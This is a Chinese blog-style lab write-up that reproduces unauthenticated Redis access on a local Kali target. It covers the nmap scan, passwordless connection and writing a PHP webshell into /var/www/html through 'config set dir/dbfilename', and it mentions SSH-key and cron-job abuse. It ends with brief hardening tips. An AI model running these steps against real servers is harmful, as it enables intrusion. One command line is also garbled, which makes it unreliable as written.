本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的 ssh 公钥写入目标服务器的 /root/.ssh 文件夹的 authotrized_keys 文件中,进而可以使用对应私钥直接使用 ssh 服务登录目标服务器、添加计划任务、写入 Webshell 等操作。
环境准备:
目标靶机: kali
ip 地址: 192.168.43.151
连接工具:Putty、Redis-cli 客户端连接工具
公众号回复 "Redis" 即可获取相应工具
环境搭建:
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
tar xzvf redis-2.8.17.tar.gz #解压安装包
cd redis-2.8.17 # 进入redis目录
make #编译
cd src/ #进入src目录
cp redis-server /usr/bin/
cp redis-cli /usr/bin/ #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
cd .. # 返回上一级目录
cp redis.conf /etc/ #将redis.conf拷贝到/etc/目录下
redis-server /etc/redis.conf # 使用/etc/目录下的redis.conf文件中的配置启动redis服务
0x03 漏洞利用
利用:C:\Users\yinxinghua\Desktop\ 小白的成长之路 \tools\redis 未授权访问 \redis-2.4.5-win32-win64\64bit>****.\redis-cli.exe -h 192.168.43.151
nmap 扫描:
Nmap -A -p 6379 –script redis-info 192.168.43.151
为了方便,在 windows 攻击机里下载一个 redis clinet
下载地址:https://github.com/caoxinyu/RedisClient/releases (利用redis写webshell测试使用)
未授权访问测试
使用 redis clinet 直接无账号成功登录 redis
从登录结果可以看出 redis 未启用认证。
利用 redis 写 webshell
利用前提:
靶机 redis 未授权,在攻击机能用 redis clinet 连接,如上图,并未登录验证
靶机开启 web 服务,并且知道网站路径,还需要具有文件读写增删改查权限
这里我们调出 Console
由于本地搭建,我们已经知道网站路径(在实战中需要寻找网站绝对路径),我们把 shell 写入 /var/www/html/ 目录下:
config set dir /var/www/html
config set dbfilename test.php
config set webshell "<?php phpinfo(); ?>"
save
访问 test.php 成功如下所示!(此图来源于网络,自己环境出现了不可描述事情)
-禁止使用root权限启动redis服务。
-对redis访问启动密码认证。
-添加IP访问限制,并更改默认6379端口。
【往期推荐】
【超详细】CVE-2020-14882 | Weblogic 未授权命令执行漏洞复现
走过路过的大佬们留个关注再走呗
往期文章有彩蛋哦****
如果对你有所帮助,点个分享、赞、在看呗!